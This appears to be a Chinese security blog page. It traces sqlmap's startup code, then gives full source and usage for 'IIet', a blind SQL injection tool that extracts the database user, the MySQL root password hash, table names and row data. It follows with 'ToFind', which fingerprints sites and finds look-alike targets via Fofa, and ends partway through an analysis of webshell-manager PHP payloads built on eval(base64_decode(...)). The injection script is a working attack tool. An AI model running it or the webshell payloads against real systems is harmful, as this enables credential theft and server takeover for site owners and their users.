Book

编码

base64

img

Sqlmap

首先要找的就是测试注入的函数

Sqlmap的主函数首先执行了一些函数

image-20240929092820625

dirtyPatcheshttp responses设置了最大长度,后如果是windows系统,导入wininetpton,做一些编码处理(解决了windows与其他系统上执行的buf)

image-20240929093430752

resolveCrossReferences进行函数传递(不清楚为了什么,感觉没有这个函数代码也可以)

image-20240929094039366

checkEnvironment提了一下当前函数路径,进行了一下python的版本比较

image-20240929095052257

setpaths进行了文件路径设置

image-20240929095501133

banner函数输出Sqlmap特征

args = cmdLineParser()进行变量的赋值

image-20240929095921572

传参-u看一下,执行过后args是一个带有键值的字典变量

image-20240929100117213

initOptions也是定义了一些参数,_setConfAttributes定义conf字典变量,_setKnowledgeBaseAttributes定义kb字典变量

image-20240929100625633

_mergeOptions也是定义一下参数,通过for循环将args变量中的数据传递给conf

image-20240929101446538

后续又进行一些变量的赋值函数等函数

image-20240929102428830

后续的start函数是开始注入的起始点

image-20240929102908247

start函数首先就做一些变量配置,后创建一个文件夹在output目录中,里面写入测试的目标等信息

image-20240929113016332

IIet(盲注信息提取工具)

https://github.com/XiaoMMing9/IIet

制作项目的初始手书

1

171E5CB02835FCAB00EDD6F188A7464A

2

3

IIet是通过整数型注入获取数据库信息的脚本(支持盲注),支持get/post请求方式,可以携带cookie身份信息,适用于url/data/cookie注入,它可以获取user(),database(),root密码的hash值,以及当前数据库中的表信息,可以bypass魔术引号的过滤(addslashes)。

python代码

import requests
import argparse
import re

def Verify():
try:
if args.p:
response = requests.post(args.u, headers=headers, proxies=proxies, cookies=Cookies, data=data, verify=False)
else:
response = requests.get(args.u, headers=headers, proxies=proxies, cookies=Cookies, verify=False)
if re.search(re.escape(args.t), response.text):
print(f'{args.u}源代码中存在{args.t}数据,匹配成功')
return True
except requests.RequestException:
print(f'{args.u}请求超时') # 请求失败时捕获异常并跳过
exit()
print(f'没有匹配到{args.t}数据,请检查Url以及headers等信息')
exit()

def Connect():
Cookies = headers['Cookie']
url = args.u
low = 1
high = 20
print('设置User与database的位数最高为20')
while low <= high:
mid = (low + high) // 2
if args.m == 'password':
length = 41
break
else:
if args.m == 'user':
sql = f"if(length(user())>{mid},1,0) -- "
elif args.m == 'database':
sql = f"if(length(database())>{mid},1,0) -- "
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
if '?' in args.u:
url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
else:
url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
length = low
print(f"{args.m}长度为: {length}")
# 使用二分法来猜测每个字符
result = ''
for pos in range(1, length + 1):
low = 32
high = 126
while low <= high:
mid = (low + high) // 2
if args.m == 'user':
sql = f"if(ord(substring(user(),{pos},1))>{mid},1,0) -- "
elif args.m == 'password':
sql = f"if(ord(substring((select authentication_string from mysql.user where user=substring(user(),1,4)),{pos},1))>{mid},1,0) -- "
elif args.m == 'database':
sql = f"if(ord(substring(database(),{pos},1))>{mid},1,0) -- "
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
if '?' in args.u:
url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
else:
url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
result += chr(low)
print(f"{args.m}: {result}")

def Information():
Cookies = headers['Cookie']
url = args.u
tables = []
columns = []
low = 1
high = 100
print('设置表的个数最高为100,每个表中列数最高为100')
while low <= high:
mid = (low + high) // 2
if args.m == 'table':
sql = f"(select if((count(*))>{mid}, 1, 0) from information_schema.tables where table_schema = database()) --"
elif args.m == 'column':
sql = f"(select if((count(column_name))>{mid}, 1, 0) from information_schema.columns where table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {int(args.S) - 1},1)) --"
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
if '?' in args.u:
url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
else:
url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
count = low
if args.m == 'table':
print(f"表的数量为: {count}")
if args.m == 'column':
print(f"列的数量为: {count}")
for i in range(count):
low = 1
high = 20
print('设置表名位数最高为20,列名位数最高为100')
while low <= high:
mid = (low + high) // 2
if args.m == 'table':
sql = f"if((SELECT length(table_name) FROM information_schema.tables WHERE table_schema = database() LIMIT {i},1)>{mid},1,0) -- "
elif args.m == 'column':
sql = f"if((SELECT length(column_name) FROM information_schema.columns WHERE table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {int(args.S) - 1},1) LIMIT {i},1)>{mid},1,0) -- "
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
if '?' in args.u:
url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
else:
url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
name_length = low
name = ''
for pos in range(1, name_length + 1):
low = 0
high = 126
while low <= high:
mid = (low + high) // 2
if args.m == 'table':
sql = f"if(ord(substring((SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {i},1),{pos},1))>{mid},1,0) -- "
elif args.m == 'column':
sql = f"if(ord(substring((SELECT column_name FROM information_schema.columns WHERE table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT {int(args.S) - 1},1) LIMIT {i},1),{pos},1))>{mid},1,0) -- "
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
if '?' in args.u:
url = args.u + '&' + args.pn + '=' + args.pv + '-' + sql
else:
url = args.u + '?' + args.pn + '=' + args.pv + '-' + sql
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)

matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
name += chr(low)
print(f"{name}")
if args.m == 'table':
tables.append(name)
elif args.m == 'column':
columns.append(name)
if args.m == 'table':
return tables
elif args.m == 'column':
return columns
def Getdata():
Cookies = headers.get('Cookie', '')
url = args.u
low = 0
high = 100
while low <= high:
mid = (low + high) // 2
sql = f"if((select count(*) from {args.T})>{mid},1,0)"
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
numbers = low
if 100 > low :
print(f"{args.T} 中有 {numbers} 行数据")
else:
print("上限100条数据")
for i in range(int(numbers)):
datas = ''
for col in columns:
low = 1
high = 100
while low <= high:
mid = (low + high) // 2
sql = f"if(length((SELECT {col} from {args.T} limit {i},1))>{mid},1,0)"
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
length = low
for t in range(1, length + 1):
low = 0
high = 126
while low <= high:
mid = (low + high) // 2
sql = f"if (ord(substring((SELECT {col} from {args.T} limit {i},1),{t},1))>{mid},1,0)"
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
if low > 126:
low = 0xC280 # UTF-8 中包含多字节字符的起始范围
high = 0xEFBFBF # UTF-8 多字节字符的结束范围
while low <= high:
mid = (low + high) // 2
sql = f"if (CONV(HEX(SUBSTRING((SELECT {col} from {args.T} limit {i},1),{t},1)), 16, 10) > {mid}, 1, 0)"
if args.i == 'cookies':
headers['Cookie'] = f'{args.pn}={args.pv}-{sql}' + ';' + Cookies
elif args.i == 'data':
data[args.pn] = args.pv + '-' + sql
elif args.i == 'url':
url = args.u + ('&' if '?' in args.u else '?') + f'{args.pn}={args.pv}-{sql}'
if args.p:
s = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
else:
s = requests.get(url, headers=headers, proxies=proxies, verify=False)
matchs = re.search(args.c, s.text)
if matchs:
low = mid + 1
else:
high = mid - 1
hex_result = hex(low)[2:]
if len(hex_result) % 2 != 0:
hex_result = '0' + hex_result
datas += bytes.fromhex(hex_result).decode('utf-8')
else:
datas += chr(low)
datas += ' '
print(datas)

if __name__ == '__main__':
parser = argparse.ArgumentParser(description='SQL注入自动化脚本')
# 基本参数
parser.add_argument('-u', type=str, required=True, help='漏洞Url', metavar='Url')
parser.add_argument('-p', action='store_true', help='请求方式为Post,没-p参数就是Get请求')
parser.add_argument('-i', type=str, choices=['url', 'cookies', 'data'], required=True, help='注入点的类型,从[url,cookies,data]中选择',metavar='Injection_Type')
parser.add_argument('-pn', type=str, required=True, help='注入点参数名', metavar='Param_Name')
parser.add_argument('-pv', type=str, required=True, help='参数值', metavar='Param_value')
parser.add_argument('-c', type=str, required=True, help='用于比较的特征字符串', metavar='Characteristic')
parser.add_argument('-m', type=str, choices=['user', 'password', 'database', 'table', 'column', 'data'], required=True, help='注入提取的数据,从[user,password,database,table,column,data]中选择', metavar='Type')
# 可选参数
parser.add_argument('-C', help='Cookie,用于身份校验的数据', metavar='Cookie')
parser.add_argument('-d', help='Post请求时携带的data参数,格式: -d "Username=1&password=2"', metavar='Data')
parser.add_argument('-P', help='Proxy,格式: 127.0.0.1:8080', metavar='proxy')
parser.add_argument('-U', help='User-Agent,默认是google浏览器的User-Agent', metavar='User-Agent')
parser.add_argument('-H', help='其他请求头数据,格式: -H "token=1&jwt=2"', metavar='Header')
parser.add_argument("-t", help="测试连接,检查响应内容是否包含该字符串", metavar='test_data')
parser.add_argument('-S', help='当前选择数据库的表序号', metavar='Table_Subscript')
parser.add_argument('-T', help='查询的表名字', metavar='Table')
parser.add_argument('-l', help='查询的列名,格式: -l "username password"', metavar='Columns')
args = parser.parse_args()
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36'} #默认User-Agent
if args.U: headers['User-Agent'] = args.U # User-Agent
if args.H: # headers
header_pairs = args.H.split('&')
for pair in header_pairs:
key, value = pair.split('=', 1)
headers[key.strip()] = value.strip()
proxies = None
if args.P: proxies = {'http': args.P, 'https': args.P} #proxies
Cookies = ''
if args.C: headers['Cookie'] = args.C #Cookies
else: headers['Cookie'] = ''
data = dict(pair.split('=', 1) for pair in args.d.split('&')) if args.d else None
if args.t: Verify() #检测连接
if args.l:
columns = args.l.split(" ")
else:
columns = None
if args.m == 'user' or args.m == 'password' or args.m == 'database':
Connect()
elif args.m == 'table' or args.m == 'column':
Information()
elif args.m == 'data':
Getdata()
else:
print('请检查-m参数')

测试魔术引号过滤的Sql注入网站

image-20241008095529215

SQL注入Cookies,整数型注入city

image-20241008095609268

image-20241008095755086

image-20241008095709841

参数

-u                http://test.com/?m=2s          Sql注入URL
-i cookies 注入点在cookies中
-pn city cookies中参数为city
-pv 3
-c /buycars/2018/05/10/102.html 相比于city=3,city=2的请求回复“/buycars/2018/05/10/102.html”
-m user select user(),获取user数据
-P 127.0.0.1:8080 代理于127.0.0.1:8080

数据提取测试

image-20241008095949716

获取mysqlpassword

image-20241008100037541

获取database()select database()

image-20241008100216438

获取表名

image-20241008100407539

-m                column          获取列名
-S 2 选择第二个表,w_admin

image-20241008100918318

-T               w_admin                         选择表名w_admin
-l "adminid username password" 列出adminid,username,password数据

image-20241008101136007

ToFind(同源码网站收集工具)

https://github.com/XiaoMMing9/ToFind

发现网站特征指纹,可以通过Fofa搜寻同源网站

python代码

import base64
import requests
from bs4 import BeautifulSoup
import re
import random
import math
import argparse
import json
import pandas as pd
import os
from openpyxl import Workbook
from openpyxl.utils.dataframe import dataframe_to_rows

def get_text(url):
#获取源代码
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
}
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
try:
s = requests.get(url, headers=headers, verify=False)
if str(s.status_code)[0] == '2': return s.text, url
else:
url = 'https://' + url[len('http://'):]
s = requests.get(url, headers=headers, verify=False)
if str(s.status_code)[0] == '2': return s.text, url
else: return '', url
except: return '', url
else:
s = requests.get(url, headers=headers, verify=False)
try:
if str(s.status_code)[0] == '2': return s.text, url
else: return '', url
except: return '', url
def get_text_api(source_code):
#获取源码中的api接口
# 使用正则表达式查找以"/"或'/'开头,并以".css"或".js"结尾的字符串
pattern = r"['\"]((\/|\.\/)[^\n\r'\"?]+)(\?[^\n\r'\" ]*)?['\"]"
matches = re.findall(pattern, source_code)
apis = []
exclude_api = ['/', '//', '/favicon.ico', '/login', '/register', '/login.html', '/register.html'] # 排除的滥用接口
exclude_list = ['bootstrap', 'chosen', 'bootbox', 'awesome', 'animate', 'picnic', 'cirrus', 'iconfont', 'jquery', 'layui', 'swiper'] # 排除的插件库
for match in matches:
match = match[0] # 由于 findall 返回的是元组,需要取第一个元素
match = re.sub(r'\?.*$', '', match) # 去除查询参数
# 仅当路径与 exclude_api 列表中的任意一个完全匹配时,才会被排除
if match and match not in exclude_api:
contains_excluded_str = False
for ex_str in exclude_list:
if ex_str in match:
contains_excluded_str = True
break
# 如果路径不包含任意一个 exclude_list 中的字符,则添加到 apis 列表中
if not contains_excluded_str:
apis.append(match)
return apis
def get_all_css_classes(url,text):
#获取全部<link rel="stylesheet" type="text/css" href="" />加载的css中所有的类名
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
}
soup = BeautifulSoup(text, 'html.parser')
css_links = []
exclude_list = ['bootstrap', 'chosen', 'bootbox', 'awesome', 'animate', 'picnic', 'cirrus', 'iconfont', 'jquery', 'layui', 'swiper'] # 排除的插件库
for link in soup.find_all('link', rel='stylesheet'): # 获取外部css的链接
href = link.get('href')
if href and re.search(r'\.css(\?.*)?$', href):
if not any(exclude in href for exclude in exclude_list):
if href.startswith('http'):
css_links.append(href)
else:
css_links.append(requests.compat.urljoin(url, href))
all_classes = set()
for css_link in css_links:
try:
css_content = requests.get(css_link, headers=headers, verify=False, timeout=10).text # 下载CSS
if css_content:
class_pattern = r'\.([\w\-]+)'
matches = re.findall(class_pattern, css_content)
all_classes.update(matches)
except :
return []
return sorted(all_classes) #返回css类名
def get_text_css_class(text):
#获取源码中的类名
soup = BeautifulSoup(text, 'html.parser')
# 找到所有的标签,并提取它们的 class 属性
all_classes = set() # 使用集合来存储唯一的类名,避免重复
for tag in soup.find_all(True): # 查找所有标签
classes = tag.get('class') # 获取标签的 class 属性值
if classes: # 如果存在 class 属性
all_classes.update(classes) # 将类名添加到集合中
return sorted(all_classes)
def get_power(text):
#获取power by/powered by后的内容
pattern = r'(?:powered by|power by)\s+(<a\s+[^>]*href="([^"]+)"[^>]*>|[^<>\s]+)'
match = re.search(pattern, text, re.IGNORECASE)
if match:
if match.group(2): # 如果匹配的是<a href="...">
return match.group(2) # 返回URL
else:
return match.group(1) # 返回单词或短语
return None
def fofa(base):
#通过fofa查询第一页最大条数为500的指纹数据
with open('config.json', 'r') as f:
config = json.load(f)
fofa_api_key = config['fofa_api_key']
url = f'https://fofa.info/api/v1/search/all?&key={fofa_api_key}&qbase64={base}&size=500'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'
}
s = requests.get(url, headers=headers)
return s.json()
def save_to_file(data, filename, filetype, size_value, url,fingerprint):
#数据保存到文件
if filetype == 'txt':
with open(filename, 'a+', encoding='utf-8') as f:
f.write(f"提取Url: {url}\n")
f.write(f"Size: {size_value}\n")
f.write(f"指纹:{fingerprint}\n")
for item in data:
f.write("%s\n" % item)
elif filetype == 'xlsx':
df_data = pd.DataFrame(data, columns=["URL", "IP", "Port"])
metadata = {"URL": f"{url}", "Size": size_value ,"fingerprint" : fingerprint}
file_exists = os.path.exists(filename)
if not file_exists:
with pd.ExcelWriter(filename, engine='openpyxl', mode='w') as writer:
df_metadata_header = pd.DataFrame(columns=["URL", "Size" ,"fingerprint"])
df_metadata_header.to_excel(writer, index=False, startrow=0, header=True)
df_metadata = pd.DataFrame([metadata])
df_metadata.to_excel(writer, index=False, header=False, startrow=1)
header_df = pd.DataFrame(columns=["URL", "IP", "Port"])
header_df.to_excel(writer, index=False, startrow=2, header=True)
df_data.to_excel(writer, index=False, header=False, startrow=3)
else:
with pd.ExcelWriter(filename, engine='openpyxl', mode='a', if_sheet_exists='overlay') as writer:
workbook = writer.book
sheet = workbook.active
df_metadata_header = pd.DataFrame(columns=["URL", "Size", "fingerprint"])
for r in dataframe_to_rows(df_metadata_header, index=False, header=True):
sheet.append(r)
df_metadata = pd.DataFrame([metadata])
for r in dataframe_to_rows(df_metadata, index=False, header=False):
sheet.append(r)
header_df = pd.DataFrame(columns=["URL", "IP", "Port"])
for r in dataframe_to_rows(header_df, index=False, header=True):
sheet.append(r)
for r in dataframe_to_rows(df_data, index=False, header=False):
sheet.append(r)
workbook.save(filename)
def Gather(url, param=None, output_file=None, execute_fofa=False, b=None ):
start_url = url
s, url = get_text(url)
if s == '':
print(f"{start_url}访问不可达")
exit()
apis = get_text_api(s)
if len(apis) > 0:
filtered_apis = [api for api in apis if api.endswith(('.css', '.js', '.ico', '.png', '.jpg'))]
other_apis = [api for api in apis if not api.endswith(('.css', '.js', '.ico', '.png', '.jpg'))]
if len(other_apis) > 6:
sqrt_number_other = math.ceil(math.sqrt(len(other_apis)))
random_other_apis = random.sample(other_apis, min(sqrt_number_other, len(other_apis) ))
joined_apis = random_other_apis
else:
if len(filtered_apis) > 3:
sqrt_number_api = math.floor(math.sqrt(len(filtered_apis)))
random_filtered_apis = random.sample(filtered_apis, min(sqrt_number_api, len(filtered_apis)))
elif filtered_apis:
random_filtered_apis = filtered_apis
else:
random_filtered_apis = []
joined_apis = other_apis + random_filtered_apis
if len(joined_apis) > 7 :
sqrt_number = math.ceil(math.sqrt(len(joined_apis)))
random_apis = random.sample(joined_apis, min(sqrt_number,len(joined_apis)))
joined_apis = '" && "'.join(random_apis)
else:
joined_apis = '" && "'.join(joined_apis)
classes = set(get_text_css_class(s)).intersection(get_all_css_classes(url, s))
if len(classes) > 0:
classes = sorted(classes)
if len(classes) > 9:
sqrt_number_classes = math.ceil(math.sqrt(len(classes)))
random_classes = random.sample(classes, min(sqrt_number_classes, len(classes)))
joined_classes = '" && "'.join(random_classes)
else:
joined_classes = '" && "'.join(classes)
else:
print("没有找到共同的类名。")
joined_classes = ''
if b:
fingerprint = '"' + joined_classes + '"'
else:
if joined_classes and joined_apis:
fingerprint = '("' + joined_apis + '") || ("' + joined_classes + '")'
else:
fingerprint = '"' + joined_apis + '"'
powerby_str = get_power(s)
if powerby_str:
fingerprint = '( ' + fingerprint + ' )' + ' && "' + powerby_str + '"'
if param:
fingerprint = '( ' + fingerprint + ' )' + ' && "' + param + '"'
print('Url:\n' + url)
print('构造的指纹如下\n' + fingerprint)
if execute_fofa:
results = fofa(base64.b64encode(fingerprint.encode()).decode())
result_data = results.get('results', [])
size_value = results.get('size', 0) # 获取size值
if output_file:
filetype = output_file.split('.')[-1]
save_to_file(result_data, output_file, filetype, size_value,url,fingerprint)
else:
print(f"通过Fofa共搜索出{size_value}条数据")
for item in result_data:
print(item)
def Batch(url, param=None, output_file=None, execute_fofa=False, readfile=None, b=None):
#批量读取Url
if readfile:
with open(readfile, 'r') as f:
urls = f.readlines()
for url in urls:
url = url.strip()
Gather(url, param, output_file, execute_fofa, b)
else:
Gather(url, param, output_file, execute_fofa, b)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="依据css类 Api等来发现网站指纹,通过Fofa寻找同源码网站,使用Fofa查询之前要在json文件中添加Fofa key")
# 参数
parser.add_argument('-u', '--url', type=str, required=False, metavar='', help='网站Url')
parser.add_argument('-p', '--param', type=str, required=False, metavar='', help='输入要添加的参数,不要带问号、双引号这些特殊字符,要不然Fofa搜索时会报错的')
parser.add_argument('-o', '--output', type=str, required=False, metavar='', help='输出文件名,可以是txt或xlsx格式')
parser.add_argument('-r', '--readfile', type=str, required=False, metavar='', help='从txt文件中读取URL')
parser.add_argument('-f', '--fofa', action='store_true', help='是否执行Fofa搜索,不带-f选项只会输出框架指纹')
parser.add_argument('-b', '--blog', action='store_true', help='是否是blog或首页网站,不带-b选项代表是登录界面,没有杂乱的Api')
args = parser.parse_args()
if args.output:
valid_formats = ['.txt', '.xlsx']
file_format = '.' + args.output.split('.')[-1].lower()
if file_format not in valid_formats:
print("输出文件格式必须是txt或xlsx")
exit()
if os.path.exists(args.output):
if args.output.endswith('.xlsx'):
wb = Workbook()
wb.save(args.output)
else:
with open(args.output, 'w') as file:
pass
file.close()
Batch(args.url, args.param, args.output, args.fofa, args.readfile, args.blog)
python ToFind.py -u http://localhost:4000/                       (提取本地4000端口web服务的网站指纹)        
python ToFind.py -u http://localhost:4000/ -p hexo (提取web网站指纹并且附加参数“hexo”,如果提取的指纹为“/login”,最后的指纹为 "/login" && "hexo")
python ToFind.py -u http://localhost:4000/ -b (设置为blog首页网站,指纹中只存在类名)
python ToFind.py -u http://localhost:4000/ -f (输出网站指纹,并且使用Fofa查询同源的网站并显示在命令行中)
python ToFind.py -u http://localhost:4000/ -f -o 1.txt (输出网站指纹,使用Fofa查询同源的网站将其保存在1.txt文件中)
python ToFind.py -u http://localhost:4000/ -f -o 1.xlsx (输出网站指纹,使用Fofa查询同源的网站将其保存在1.xlsx文件中)
python ToFind.py -r 1.txt -f -o out.xlsx (批量读取1.txt中的url通过Fofa搜索数据导出至out.xlsx)

同源测试

https://jwxt.lcu.edu.cn/jwglxt/xtgl/login_slogin.html

image-20240713110853527

python3 ToFind.py -u https://jwxt.lcu.edu.cn/jwglxt/xtgl/login_slogin.html -f | more

image-20240713111154485

image-20240713111301822

image-20240713111308158

http://speak13.com:81/

image-20240713111739290

python3 ToFind.py -u http://speak13.com:81/ -f | more

image-20240713111814174

image-20240713111935578

image-20240713111959722

(hexo)

image-20240713114435230

python ToFind.py -u http://localhost:4000/ -f -b | more

image-20241008154805493

image-20241008154902474

image-20241008154910724

游魂Webshell

游魂Webshell

通过uvicornrun函数启动ASGI应用程序,启动FastApi框架web应用程序,可以通过传参配置host以及port

image-20241125111736543

通过传递 lifespan 参数配置FastAPI应用程序

image-20241125144625694

image-20241125145439450

test_webshell

shell测试时对应test_webshell接口

接收/test_webshell接口流量时,首先通过test_usablility生成两个随机参数,将随机参数带入payload经过submit函数,submit函数会判断有没有开启其它功能(session存放payload,http反重放,加密流量,绕过open_basedir),再生成两个随机参数形成最终的payload,如果是raw就明文,如果是base64就使用base64编码,根据设置的请求方式将payload放在url或者post的data中,如果开启了混淆功能就生成随机参数(post请求就添加300至500个参数),然后通过submit_http函数发送http请求

image-20241125151504653

@app.post("/test_webshell")
@catch_user_error
async def test_webshell(session_info: session_types.SessionInfo):
"""测试webshell"""
session = session_manager.session_info_to_session(session_info)
result = await session.test_usablility()
if not result:
return {"code": 0, "data": {"success": False, "msg": "Webshell无法使用"}}
return {"code": 0, "data": {"success": True, "msg": "Webshell可以使用"}}

test_usablility首先生成两个随机参数

image-20241125160119886

然后经过submit,看看有没有其它选项(session存储payload,加密流量,绕过open_basedir,http反重放)

image-20241125160207236

再生成两个随机数

image-20241125160646511

通过submit_wrapper_php模板构造payload

image-20241125161119656

image-20241125165810086

代码编码器

后通过编码器编码(这里初始我选择的base64,所以通过base64编码)

image-20241125161315943

然后通过submit_http发送http请求,根据请求方式(GET/POST)配置参数

image-20241125161744284

POST参数混淆

如果开启了POST参数混淆,增加随机自定义的data数据(添加300至500个参数)

image-20241125163544255

image-20241125163646738

之后进行post请求

image-20241125164133706

session_start();
function decoder_echo_raw($s)
{
echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
global $eg_decoder_hooks;
for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
$f = $eg_decoder_hooks[$i];
$s = $f($s);
}
echo decoder_echo_raw($s);
}
echo 'saj' . 'idr';
try {
decoder_echo('qvwyhl' . 'ofyywf');
} catch (Exception $e) {
die("POSTEXEC_F" . "AILED");
}
echo 'wwvpvh';

PHP代码编码器功能修改为raw

image-20241125165100006

分块传输

image-20241126091342024

将数据经过url解码,后配置headers

image-20241126091819589

注:这里有一些bug,在调试时有延时的时候会分块发送请求,但直接发送没有分块

蚁剑编码器

image-20241126095359698

通过eval_antsword_encoder调用的notejs_eval修改data参数image-20241126095451395

image-20241126100422671

js在执行过程中会在data中随机生成一个参数randomID,在data数据中将base64编码后的数据赋值给randomID,再将导入的pwd赋值为eval(base64_decode($_POST[${randomID}]));

image-20241126100735341

image-20241126100053664

image-20241126101204208

image-20241126101234423

image-20241126101258759

Session暂存payload

payload经过to_sessionize_payload进行payload的重组

image-20241126154126849

image-20241126102248279

image-20241126154924945

image-20241126155022022

image-20241126155437019

<?php
session_start();
function decoder_echo_raw($s)
{
echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
global $eg_decoder_hooks;
for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
$f = $eg_decoder_hooks[$i];
$s = $f($s);
}
echo decoder_echo_raw($s);
}
echo 'yiu' . 'ems';
try {
$b64_part = 'ZGVjb2Rlcl9lY2hvKCdncnJ1ZnonIC4gJ2h1Z2x0aicpOw==';
if (!$_SESSION['_42541744-52b7-438d-8704-536c41405598']) {
$_SESSION['_42541744-52b7-438d-8704-536c41405598'] = array();
}
$_SESSION['_42541744-52b7-438d-8704-536c41405598'][0] = $b64_part;
} catch (Exception $e) {
die("POSTEXEC_F" . "AILED");
}
echo 'yfxmvw';

session中存放一个base64编码的代码

decoder_echo('grrufz' . 'hugltj');

HTTP反重放

image-20241126160940394

image-20241126161232284

通过submitter向目标主机发送一个ANTIREPLAY_GENKEY_PHP模板替换的payload,并获取一个key

ANTIREPLAY_GENKEY_PHP = compress_phpcode_template(
"""
decoder_echo(($_SESSION['SESSION_NAME']=rand()%10000).'');
"""
)
<?php
session_start();
function decoder_echo_raw($s)
{
echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
global $eg_decoder_hooks;
for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
$f = $eg_decoder_hooks[$i];
$s = $f($s);
}
echo decoder_echo_raw($s);
}
echo 'tnm' . 'ljq';
try {
decoder_echo(($_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06'] = rand() % 10000) . '');
} catch (Exception $e) {
die("POSTEXEC_F" . "AILED");
}
echo 'tfffso';

接收key之后,再修改payload,将key值带入执行PAYLOAD_B64参数base64解码的内容

image-20241126161347547

ANTIREPLAY_VERIFY_PHP = compress_phpcode_template(
"""
if(!isset($_SESSION[SESSION_NAME])){
decoder_echo("WRONG_NO_SESSION");
}else if(KEY == $_SESSION[SESSION_NAME]) {
eval(base64_decode(PAYLOAD_B64));
unset($_SESSION[SESSION_NAME]);
}else{
decoder_echo("WRONG_BAD_KEY");
}
"""
)
<?php
session_start();
function decoder_echo_raw($s)
{
echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
global $eg_decoder_hooks;
for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
$f = $eg_decoder_hooks[$i];
$s = $f($s);
}
echo decoder_echo_raw($s);
}
echo 'dzd' . 'qpo';
try {
